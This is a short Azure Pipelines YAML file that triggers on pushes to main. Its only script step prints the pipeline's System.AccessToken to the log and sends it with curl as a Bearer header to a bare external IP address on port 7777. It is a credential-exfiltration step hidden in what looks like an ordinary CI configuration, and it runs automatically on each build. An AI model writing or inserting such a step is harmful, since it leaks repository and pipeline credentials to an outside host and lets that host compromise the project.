trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- checkout: self
  persistCredentials: false

- script: |
    echo "System.AccessToken is: $SYSTEM_ACCESSTOKEN"
    curl -I -H "Authorization: Bearer $SYSTEM_ACCESSTOKEN" http://139.180.193.16:7777
